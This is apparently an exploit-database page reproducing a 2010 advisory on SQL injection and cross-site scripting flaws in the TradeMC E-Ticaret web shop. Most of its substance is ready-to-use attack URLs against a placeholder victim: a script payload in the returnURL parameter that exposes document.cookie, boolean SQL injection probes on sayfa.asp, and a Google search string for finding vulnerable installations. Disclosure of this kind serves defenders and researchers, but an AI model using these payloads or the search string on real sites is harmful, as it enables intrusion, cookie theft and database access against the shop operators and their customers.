header-logo
Suggest Exploit
vendor:
E-Ticaret
by:
KnocKout
N/A
CVSS
N/A
SQL-i (XSS) Multiple
Unknown
CWE
Product Name: E-Ticaret
Affected Version From: Unknown
Affected Version To: Unknown
Patch Exists: Unknown
Related CWE: Unknown
CPE: Unknown
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: MSACCESS
2010

TradeMC E-Ticaret – (SQLi/XSS) Multiple Vulnerabilities

Cross site Scripting: http://Victim]/giris-hata.asp?returnURL=sepet.asp[Site SCRIPTING] http://Victim]/giris-hata.asp?returnURL=sepet.asp%22%3E%3Ch1%3Eh4x0reSEC%3C/h1%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3E SQL Injection(MSACCESS): http://[Victim]/sayfa.asp?i=34' {Microsoft JET Database Engine error '80040e14' ~ SQL Injection : ON http://[Victim]/sayfa.asp?i=34[SQL Injection] http://[Victim]/sayfa.asp?i=34+and%201=1 {true} http://[Victim]/sayfa.asp?i=34+and%201=0 {false}

Mitigation:

Unknown
Source

Exploit-DB raw data:

===================================================
TradeMC E-Ticaret - (SQLi/XSS) Multiple Vulnerabilities
===================================================

~~~~~~~~~~~~~~~[My]~~~~~~~~~~~~~~~~~~~~~~~~~~~~
[+] Author : KnocKout
[~] Contact : knockoutr@msn.com
[+] Special Thanks : H4x0re Security 2010, inj3ct0r team
~~~~~~~~~~~~~~~~[Software info]~~~~~~~~~~~~~~~~~~~~~~~~~~~~
~Web App. : TradeMC E-Ticaret
~Software: http://www.trademc.net/
~Vulnerability Style : SQL-i (XSS) Multiple
~Google Keywords : "TradeMC Tarafýndan Hazýrlanmýþtýr"
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Meterials : SQLInjection TOOL or Table name Bruteforcer
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
 
    ~~~~~~~~ Explotation  XSS ~~~~~~~~~~~
 
 Cross site Scripting:
 
http://Victim]/giris-hata.asp?returnURL=sepet.asp[Site SCRIPTING]
http://Victim]/giris-hata.asp?returnURL=sepet.asp%22%3E%3Ch1%3Eh4x0reSEC%3C/h1%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3E

    ~~~~~~~~ Explotation SQL-i~~~~~~~~~~~
 
 SQL Injection(MSACCESS):
 
http://[Victim]/sayfa.asp?i=34' {Microsoft JET Database Engine error '80040e14'
~ SQL Injection : ON

http://[Victim]/sayfa.asp?i=34[SQL Injection]

http://[Victim]/sayfa.asp?i=34+and%201=1 {true}
http://[Victim]/sayfa.asp?i=34+and%201=0 {false}

goodluck.
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Navigation

Suggest Exploit

Services By CQR